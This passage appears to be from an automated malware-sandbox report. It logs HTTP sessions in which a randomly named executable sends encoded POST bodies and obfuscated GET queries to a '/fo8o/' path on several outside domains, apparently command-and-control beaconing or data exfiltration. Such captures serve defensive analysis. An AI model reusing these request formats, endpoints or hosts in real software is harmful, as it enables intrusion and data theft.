                                                          Data Ascii: Plm0mn68=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJAgN4NsucU2zMC90r05Da+N/z226MVTHuXcLJDNM/nVphYbsXIAqYpOb6O/GZQMW1kGCu/0PRKOo5PX2vvoyoYSrN8KDY/7Z/yoq1tLsdCLOTb0S/epPWm6E8mdkYIbqnTiexjxL3NZWhnnHG80GfuGW24F83cBuy1A8rQy9Lp52A7GvYSYVIs/I3r8g7Zbj/ztOF45eZSFgfaBnPuRAOsn2Xt2Vp8HuFGw878+gN2BryldwNFGgAZSIxk3fgsqPAPahp9LUhDAwHeMWJtmSK6OeCDThVjBE7zJJJx0btYqpNJOfJCLFbfhZZiwlYB9p5dkODFcSUOpz0h/mwyF5OM906gm7ZV03J6dK1Vxfgojz6iB1wpMYBMRckzt2D/eIJtpT20mt4OA+JQXnrpexn1yMz8KdBrvpVD3U3zmeu86O+GkCmNwX7rMVU1cLUAi6eDP91cfrHTUWULSg8QPjipQC0PcC/GCq+YVMXHhXxD5wzig4vxekCYTpVYZipXjiiZIvQaAQFC7hmpC1AbIVYNRRZEb41tWov5AMqRlLiTbWPtjQ9uONwD1KCxGB0412qA4Kbc92OIfsourRmt+pOu57FojipUf+K+41IChjLJy3WG6SaABhRSvFLg5JBBa1I1R+vFj74Pg3XYGN6YoZcsM4v1XQu9a5qUtGMLt9n4kQLanQZosbnFyxGK9PGSROzwxWMGX1iyxA04Xbxtjtqvdvs0G55TeL20KSKniOZ83+UdQoGsYEt1RkWFgAqa3JqQHgOqqwn76jr+RIcVDQhFfXPJqCg+/c5lh2hRsRx8cooQh/BDEWAZ6Ab11kuAT+7TGrH6aNwMlnC6NeZMJCh8jGzl5kXirquVdNiOC6Jgcqo2YKO8gpBClsQEAK34f/fEJ3cr0H35RrLK/aRrUwZ+S+oixHJ1DkdJUrOZIdo0VE64eWxpB3wpbR/tETOU/ykn [TRUNCATED]
                                                          May 23, 2024 20:21:23.283417940 CEST599INHTTP/1.1 301 Moved Permanently
                                                          Content-Type: text/html; charset=utf-8
                                                          Location: https://www.goldenjade-travel.com/fo8o/
                                                          Server: Microsoft-IIS/10.0
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
                                                          Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
                                                          Access-Control-Allow-Credentials: true
                                                          Date: Thu, 23 May 2024 18:21:22 GMT
                                                          Connection: close
                                                          Content-Length: 156
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6c 64 65 6e 6a 61 64 65 2d 74 72 61 76 65 6c 2e 63 6f 6d 2f 66 6f 38 6f 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.goldenjade-travel.com/fo8o/">here</a>.</h2></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          10192.168.2.849723116.50.37.244803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:21:24.947402000 CEST527OUTGET /fo8o/?kzN4Y=k0xDPL&Plm0mn68=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2yArpDgvi6oTdq6vPucKXgoaIsT3InbTvvq+zcnCyLgXuQ== HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Host: www.goldenjade-travel.com
                                                          Connection: close
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          May 23, 2024 20:21:25.835484982 CEST913INHTTP/1.1 301 Moved Permanently
                                                          Content-Type: text/html; charset=utf-8
                                                          Location: https://www.goldenjade-travel.com/fo8o/?kzN4Y=k0xDPL&Plm0mn68=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2yArpDgvi6oTdq6vPucKXgoaIsT3InbTvvq+zcnCyLgXuQ==
                                                          Server: Microsoft-IIS/10.0
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
                                                          Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
                                                          Access-Control-Allow-Credentials: true
                                                          Date: Thu, 23 May 2024 18:21:25 GMT
                                                          Connection: close
                                                          Content-Length: 315
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6c 64 65 6e 6a 61 64 65 2d 74 72 61 76 65 6c 2e 63 6f 6d 2f 66 6f 38 6f 2f 3f 6b 7a 4e 34 59 3d 6b 30 78 44 50 4c 26 61 6d 70 3b 50 6c 6d 30 6d 6e 36 38 3d 4c 46 4b 71 79 72 63 75 37 67 31 4e 43 61 38 63 56 31 72 32 74 4e 6b 6f 68 72 6f 64 75 54 36 70 72 49 4d 4c 74 61 57 67 4b 4a 39 62 42 4b 51 72 34 64 73 6e 79 4d 50 46 70 4d 51 6a 4a 4c 47 52 37 69 65 79 78 75 70 4f 53 70 76 31 48 62 66 55 61 4d 61 46 32 79 41 72 70 44 67 76 69 36 6f 54 64 71 36 76 50 75 63 4b 58 67 6f 61 49 73 54 33 49 6e 62 54 76 76 71 2b 7a 63 6e 43 79 4c 67 58 75 51 3d 3d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.goldenjade-travel.com/fo8o/?kzN4Y=k0xDPL&amp;Plm0mn68=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2yArpDgvi6oTdq6vPucKXgoaIsT3InbTvvq+zcnCyLgXuQ==">here</a>.</h2></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          11192.168.2.84972446.30.213.191803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:21:31.091759920 CEST801OUTPOST /fo8o/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.antonio-vivaldi.mobi
                                                          Origin: http://www.antonio-vivaldi.mobi
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 209
                                                          Referer: http://www.antonio-vivaldi.mobi/fo8o/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          Data Raw: 50 6c 6d 30 6d 6e 36 38 3d 43 52 4e 5a 6a 69 7a 54 4b 44 54 64 6b 52 35 38 65 32 62 58 69 70 4f 6a 51 67 39 6e 58 49 5a 50 54 73 6a 6b 6e 6c 36 6b 56 4e 59 54 70 6e 41 61 59 37 75 74 36 56 71 57 44 58 49 4f 36 55 6f 74 53 70 6f 38 4f 56 2f 4e 4e 5a 53 39 32 39 6e 4c 43 63 50 43 44 48 4a 65 37 35 51 32 66 46 4f 70 35 50 7a 68 78 53 4f 58 48 69 4e 78 6d 7a 61 6d 6d 45 2f 4a 74 73 59 39 32 6c 49 62 39 6e 41 55 2b 67 6e 51 41 4b 75 6e 65 53 4e 74 6e 30 74 57 37 64 63 49 2f 48 79 63 76 4b 62 52 33 31 30 4f 6e 77 45 42 68 79 43 2f 55 5a 41 70 48 36 33 2f 41 36 49 43 4d 46 4c 59 56 43 76 4e 75 62 6a 38 72 39 48 73 4f 49 51 3d
                                                          Data Ascii: Plm0mn68=CRNZjizTKDTdkR58e2bXipOjQg9nXIZPTsjknl6kVNYTpnAaY7ut6VqWDXIO6UotSpo8OV/NNZS929nLCcPCDHJe75Q2fFOp5PzhxSOXHiNxmzammE/JtsY92lIb9nAU+gnQAKuneSNtn0tW7dcI/HycvKbR310OnwEBhyC/UZApH63/A6ICMFLYVCvNubj8r9HsOIQ=
                                                          May 23, 2024 20:21:31.757934093 CEST560INHTTP/1.1 302 Found
                                                          Cache-Control: max-age:600, public
                                                          Content-Length: 163
                                                          Expires: Thu, 23 May 2024 18:31:31 GMT
                                                          Last-Modified: Thu, 23 May 2024 18:21:31 GMT
                                                          Location: https://musee.mobi/vivaldi/fo8o/
                                                          Date: Thu, 23 May 2024 18:21:31 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          X-Onecom-Cluster-Name:
                                                          X-Varnish: 7888543071
                                                          Age: 0
                                                          Via: 1.1 webcache2 (Varnish/trunk)
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 20 22 68 74 74 70 73 3a 2f 2f 6d 75 73 65 65 2e 6d 6f 62 69 2f 76 69 76 61 6c 64 69 2f 66 6f 38 6f 2f 22 20 3e 68 65 72 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 09
                                                          Data Ascii: <!DOCTYPE html><html><head><title>Found</title></head><body><p>The document has moved <a href= "https://musee.mobi/vivaldi/fo8o/" >here</a></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          12192.168.2.84972546.30.213.191803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:21:33.678595066 CEST821OUTPOST /fo8o/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.antonio-vivaldi.mobi
                                                          Origin: http://www.antonio-vivaldi.mobi
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 229
                                                          Referer: http://www.antonio-vivaldi.mobi/fo8o/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          Data Raw: 50 6c 6d 30 6d 6e 36 38 3d 43 52 4e 5a 6a 69 7a 54 4b 44 54 64 32 69 68 38 63 56 7a 58 72 70 4f 73 4d 77 39 6e 63 6f 5a 4c 54 73 2f 6b 6e 6e 58 37 53 2f 4d 54 6f 46 49 61 62 35 47 74 2f 56 71 57 4c 33 49 50 33 30 6f 6b 53 70 6c 44 4f 55 44 4e 4e 5a 47 39 32 35 76 4c 43 76 33 4e 42 58 4a 51 77 5a 51 34 62 46 4f 70 35 50 7a 68 78 53 61 78 48 69 6c 78 6d 67 43 6d 6e 6c 2f 4b 7a 38 59 2b 78 6c 49 62 77 48 41 59 2b 67 6d 7a 41 4c 7a 38 65 55 52 74 6e 77 70 57 38 4d 63 4a 71 33 7a 58 78 36 61 42 36 46 46 79 35 43 45 64 74 68 2b 4f 61 4b 67 4f 43 4d 61 56 61 59 41 45 50 46 6a 7a 56 42 48 37 72 73 2b 55 78 65 58 63 51 66 45 68 61 6e 4a 4a 31 2b 61 6d 58 76 5a 4d 39 5a 67 5a 47 6a 4a 39
                                                          Data Ascii: Plm0mn68=CRNZjizTKDTd2ih8cVzXrpOsMw9ncoZLTs/knnX7S/MToFIab5Gt/VqWL3IP30okSplDOUDNNZG925vLCv3NBXJQwZQ4bFOp5PzhxSaxHilxmgCmnl/Kz8Y+xlIbwHAY+gmzALz8eURtnwpW8McJq3zXx6aB6FFy5CEdth+OaKgOCMaVaYAEPFjzVBH7rs+UxeXcQfEhanJJ1+amXvZM9ZgZGjJ9
                                                          May 23, 2024 20:21:34.326613903 CEST560INHTTP/1.1 302 Found
                                                          Cache-Control: max-age:600, public
                                                          Content-Length: 163
                                                          Expires: Thu, 23 May 2024 18:31:34 GMT
                                                          Last-Modified: Thu, 23 May 2024 18:21:34 GMT
                                                          Location: https://musee.mobi/vivaldi/fo8o/
                                                          Date: Thu, 23 May 2024 18:21:34 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          X-Onecom-Cluster-Name:
                                                          X-Varnish: 7974125753
                                                          Age: 0
                                                          Via: 1.1 webcache2 (Varnish/trunk)
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 20 22 68 74 74 70 73 3a 2f 2f 6d 75 73 65 65 2e 6d 6f 62 69 2f 76 69 76 61 6c 64 69 2f 66 6f 38 6f 2f 22 20 3e 68 65 72 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 09
                                                          Data Ascii: <!DOCTYPE html><html><head><title>Found</title></head><body><p>The document has moved <a href= "https://musee.mobi/vivaldi/fo8o/" >here</a></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          13192.168.2.84972646.30.213.191803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:21:37.670058012 CEST1838OUTPOST /fo8o/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.antonio-vivaldi.mobi
                                                          Origin: http://www.antonio-vivaldi.mobi
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1245
                                                          Referer: http://www.antonio-vivaldi.mobi/fo8o/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          Data Raw: 50 6c 6d 30 6d 6e 36 38 3d 43 52 4e 5a 6a 69 7a 54 4b 44 54 64 32 69 68 38 63 56 7a 58 72 70 4f 73 4d 77 39 6e 63 6f 5a 4c 54 73 2f 6b 6e 6e 58 37 53 2f 30 54 70 77 45 61 62 65 79 74 34 56 71 57 42 58 49 43 33 30 70 32 53 70 73 4b 4f 55 50 64 4e 63 43 39 30 65 76 4c 45 65 33 4e 62 48 4a 51 2f 35 51 31 66 46 4f 77 35 4c 66 6c 78 53 4b 78 48 69 6c 78 6d 6d 47 6d 67 30 2f 4b 30 4d 59 39 32 6c 49 66 39 6e 42 78 2b 67 2f 49 41 4c 6e 73 65 43 68 74 6d 55 4e 57 35 36 49 4a 32 6e 7a 56 77 36 62 45 36 46 4a 58 35 43 5a 6d 74 67 4b 6f 61 4a 77 4f 43 71 33 36 4a 72 41 44 65 57 6d 59 64 7a 54 4d 79 2b 47 73 75 75 4c 62 4b 4e 59 73 53 78 4e 2b 30 2f 75 72 54 70 70 47 69 63 38 63 4a 58 55 38 73 54 4d 77 61 33 38 63 74 35 64 64 35 64 49 35 56 39 4d 39 66 4d 35 61 31 37 58 63 55 4b 44 7a 55 6c 2f 78 33 36 52 32 49 4e 4f 62 4f 45 70 62 4e 39 2f 4f 67 4c 67 32 4c 42 78 68 75 77 30 43 77 4b 6b 4b 68 38 36 67 4d 62 43 54 58 38 72 54 63 77 74 4b 76 58 53 61 6b 77 69 73 61 6e 55 72 2f 47 6d 49 74 33 52 4b 39 36 62 50 2b [TRUNCATED]
                                                          Data Ascii: Plm0mn68=CRNZjizTKDTd2ih8cVzXrpOsMw9ncoZLTs/knnX7S/0TpwEabeyt4VqWBXIC30p2SpsKOUPdNcC90evLEe3NbHJQ/5Q1fFOw5LflxSKxHilxmmGmg0/K0MY92lIf9nBx+g/IALnseChtmUNW56IJ2nzVw6bE6FJX5CZmtgKoaJwOCq36JrADeWmYdzTMy+GsuuLbKNYsSxN+0/urTppGic8cJXU8sTMwa38ct5dd5dI5V9M9fM5a17XcUKDzUl/x36R2INObOEpbN9/OgLg2LBxhuw0CwKkKh86gMbCTX8rTcwtKvXSakwisanUr/GmIt3RK96bP+ifxQWkrPZduiYh/QDByfmTs3OolUKqZbiP8yyqVs1pJg64J5EYbpThc6Ak1/jUoVr5bOq3a/POoshmozbHjZgEy2xzh/rEUGu8TMEzRN0z6FJ3P5p+kHmqqWjcx/eJv/b5clHrjV8rz0NVXHFjj3vZijPP4JeC+dAQd1j6mdtBv5gm5Pubxo29+aJsbUB6EsAHivAx7qknK+smcJdpcFl420y5+SsgC24UM+NPF04Utrx+kFVXkuhWUC8ziP0X7D2o9Wij8TfOhmJclDu4PqcFzf9MQZ8E/5eIL6hBq109GUMqycEBexebycEJ9d907LNxXgL9Bp5dVpye+aiF+1pzMrJEh2Hiq93FwWiIt5ClhJbFg7eOlL234CoCrnuPmze0vTdqDE8NZAUxjXfM+JLRP4w7FZjqunPcSay3IfvhJAhqtKwDK+QpeLDikSeE9enefedNhMRD0UxJHMdzMGaSMhHDB9Nj2y+b3aV6i36T3LSHUKR1EjYF3DwfLTKSFGREfruD0toz9D87Ivwpz5159xb+62hGe2dlJtA7GjnwJRBAGADVO6u1GokRbckjrleOpkwiqyA0LYng0Aaqit5EOh212nl/LxZgDyyAdrH0WF8oe8txGVhzqhoeVxp2ATtgDiaDTM+Ths5RcLTU3b3flykoKPhCchK4 [TRUNCATED]
                                                          May 23, 2024 20:21:38.316267967 CEST560INHTTP/1.1 302 Found
                                                          Cache-Control: max-age:600, public
                                                          Content-Length: 163
                                                          Expires: Thu, 23 May 2024 18:31:38 GMT
                                                          Last-Modified: Thu, 23 May 2024 18:21:38 GMT
                                                          Location: https://musee.mobi/vivaldi/fo8o/
                                                          Date: Thu, 23 May 2024 18:21:38 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          X-Onecom-Cluster-Name:
                                                          X-Varnish: 7764525374
                                                          Age: 0
                                                          Via: 1.1 webcache2 (Varnish/trunk)
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 20 22 68 74 74 70 73 3a 2f 2f 6d 75 73 65 65 2e 6d 6f 62 69 2f 76 69 76 61 6c 64 69 2f 66 6f 38 6f 2f 22 20 3e 68 65 72 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 09
                                                          Data Ascii: <!DOCTYPE html><html><head><title>Found</title></head><body><p>The document has moved <a href= "https://musee.mobi/vivaldi/fo8o/" >here</a></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          14192.168.2.84972746.30.213.191803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:21:40.242691994 CEST526OUTGET /fo8o/?Plm0mn68=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZdmVZ54UmbyKF16zvv1yGe3hSwRWBn0bZic9A2kho+UJ9gA==&kzN4Y=k0xDPL HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Host: www.antonio-vivaldi.mobi
                                                          Connection: close
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          May 23, 2024 20:21:40.897663116 CEST882INHTTP/1.1 302 Found
                                                          Cache-Control: max-age:600, public
                                                          Content-Length: 330
                                                          Expires: Thu, 23 May 2024 18:31:40 GMT
                                                          Last-Modified: Thu, 23 May 2024 18:21:40 GMT
                                                          Date: Thu, 23 May 2024 18:21:40 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          location: https://musee.mobi/vivaldi/fo8o/?Plm0mn68=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZdmVZ54UmbyKF16zvv1yGe3hSwRWBn0bZic9A2kho+UJ9gA==&kzN4Y=k0xDPL
                                                          X-Onecom-Cluster-Name:
                                                          X-Varnish: 7864198172
                                                          Age: 0
                                                          Via: 1.1 webcache2 (Varnish/trunk)
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 20 22 68 74 74 70 73 3a 2f 2f 6d 75 73 65 65 2e 6d 6f 62 69 2f 76 69 76 61 6c 64 69 2f 66 6f 38 6f 2f 3f 50 6c 6d 30 6d 6e 36 38 3d 50 54 6c 35 67 55 2f 33 43 44 2f 58 68 67 35 4e 64 31 48 57 69 26 23 34 33 3b 65 4b 4f 69 4a 55 52 4a 52 46 54 5a 75 56 6d 6d 36 67 66 72 77 53 6a 6e 42 72 53 72 61 55 2f 30 47 64 48 41 73 44 30 6d 46 78 4e 72 41 52 46 30 7a 57 64 38 43 4c 77 76 48 4b 62 73 36 5a 64 6d 56 5a 35 34 55 6d 62 79 4b 46 31 36 7a 76 76 31 79 47 65 33 68 53 77 52 57 42 6e 30 62 5a 69 63 39 41 32 6b 68 6f 26 23 34 33 3b 55 4a 39 67 41 3d 3d 26 61 6d 70 3b 6b 7a 4e 34 59 3d 6b 30 78 44 50 4c 22 20 3e 68 65 72 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 09
                                                          Data Ascii: <!DOCTYPE html><html><head><title>Found</title></head><body><p>The document has moved <a href= "https://musee.mobi/vivaldi/fo8o/?Plm0mn68=PTl5gU/3CD/Xhg5Nd1HWi&#43;eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZdmVZ54UmbyKF16zvv1yGe3hSwRWBn0bZic9A2kho&#43;UJ9gA==&amp;kzN4Y=k0xDPL" >here</a></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          15192.168.2.84972885.159.66.93803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:21:46.222393990 CEST783OUTPOST /fo8o/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.magmadokum.com
                                                          Origin: http://www.magmadokum.com
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 209
                                                          Referer: http://www.magmadokum.com/fo8o/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          Data Raw: 50 6c 6d 30 6d 6e 36 38 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 62 4a 72 44 58 6d 7a 45 6b 6b 4b 2b 65 41 4e 6a 6e 42 2f 58 63 78 41 41 64 50 47 4a 53 64 6c 77 41 6f 2b 4c 59 71 50 65 6a 7a 49 30 2b 38 47 36 31 68 36 56 71 51 5a 2f 6e 41 31 35 43 52 7a 30 6f 38 31 47 64 7a 57 32 62 6b 49 42 59 36 52 64 37 4f 63 4a 47 69 32 32 38 68 6b 69 56 41 77 4b 42 66 6f 6d 64 51 57 2f 43 53 33 4a 47 2f 59 53 5a 70 63 58 66 74 30 42 75 77 6c 44 43 67 4f 4f 50 7a 4a 35 30 6b 54 61 43 73 48 69 48 6b 71 2f 30 30 2b 52 30 6d 4f 72 5a 72 56 62 46 67 71 33 56 78 63 4f 51 38 59 49 74 35 50 32 63 47 44 43 50 6a 33 67 72 48 6b 72 34 47 4d 3d
                                                          Data Ascii: Plm0mn68=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA15CRz0o81GdzW2bkIBY6Rd7OcJGi228hkiVAwKBfomdQW/CS3JG/YSZpcXft0BuwlDCgOOPzJ50kTaCsHiHkq/00+R0mOrZrVbFgq3VxcOQ8YIt5P2cGDCPj3grHkr4GM=
                                                          May 23, 2024 20:21:47.181947947 CEST225INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.14.1
                                                          Date: Thu, 23 May 2024 18:21:46 GMT
                                                          Content-Length: 0
                                                          Connection: close
                                                          X-Rate-Limit-Limit: 5s
                                                          X-Rate-Limit-Remaining: 19
                                                          X-Rate-Limit-Reset: 2024-05-23T18:21:51.8920515Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          16192.168.2.84972985.159.66.93803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:21:48.762984991 CEST803OUTPOST /fo8o/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.magmadokum.com
                                                          Origin: http://www.magmadokum.com
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 229
                                                          Referer: http://www.magmadokum.com/fo8o/
